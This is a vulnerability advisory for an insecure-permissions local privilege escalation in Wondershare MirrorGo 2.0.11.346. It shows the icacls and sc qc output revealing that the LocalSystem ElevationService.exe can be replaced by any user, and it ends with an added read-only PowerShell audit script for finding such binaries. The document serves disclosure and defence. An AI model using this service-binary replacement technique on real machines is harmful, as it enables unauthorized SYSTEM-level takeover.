Authored by Luis Martinez

Wondershare MirrorGo version 2.0.11.346 suffers from an insecure permissions vulnerability.

# Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-23
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/mirror_go_full8050.exe
# Tested Version: 2.0.11.346
# Vulnerability Type: Local Privilege Escalation
# Tested on OS: Windows 10 Pro x64 es

# Steps to discover Privilege Escalation:

# Insecure folder permissions issue:

C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe"

C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F)
C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F)

# Service info:

C:\>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ElevationService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

# Exploit:

A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wondershare MirrorGo executable
"ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it
with a malicious file that will be executed with "LocalSystem" privileges.
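
A defender-side audit for the condition described above, added here as an example and not part of the original advisory: it lists every service running as LocalSystem whose binary grants write-class rights to Everyone, Authenticated Users or BUILTIN\Users. The helper name Get-ServiceBinaryPath, the set of SIDs and the rights mask are assumptions of this example; the script only reads ACLs and changes nothing.

```powershell
# Added example (not from the advisory): read-only audit of LocalSystem service binaries.
# Well-known SIDs are used instead of names so the check works on localized Windows.
$broadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}
# Rights that let a principal modify or replace the file (assumed mask for this example).
$writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath([string]$PathName) {
    # PathName may be quoted and may carry arguments; return only the executable path.
    if ($PathName -match '^\s*"([^"]+)"')          { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)(\s|$)')   { return $Matches[1] }
    return $null
}

Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.StartName -eq 'LocalSystem' } |
    ForEach-Object {
        $svc  = $_
        $path = Get-ServiceBinaryPath $svc.PathName
        if (-not $path -or -not (Test-Path -LiteralPath $path)) { return }
        $acl = Get-Acl -LiteralPath $path -ErrorAction SilentlyContinue
        if (-not $acl) { return }
        # Explicit and inherited ACEs, with identities resolved to SIDs.
        $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        foreach ($rule in $rules) {
            $sid = $rule.IdentityReference.Value
            if ($rule.AccessControlType -eq 'Allow' -and
                $broadSids.ContainsKey($sid) -and
                ($rule.FileSystemRights -band $writeMask)) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    StartMode = $svc.StartMode
                    Binary    = $path
                    Principal = $broadSids[$sid]
                    Rights    = $rule.FileSystemRights
                    Inherited = $rule.IsInherited
                }
            }
        }
    }
```

Rows with Inherited = True correspond to the (I) flag in the icacls output above: the grant comes from the parent folder, so the ACL has to be corrected on the installation directory rather than on the single file.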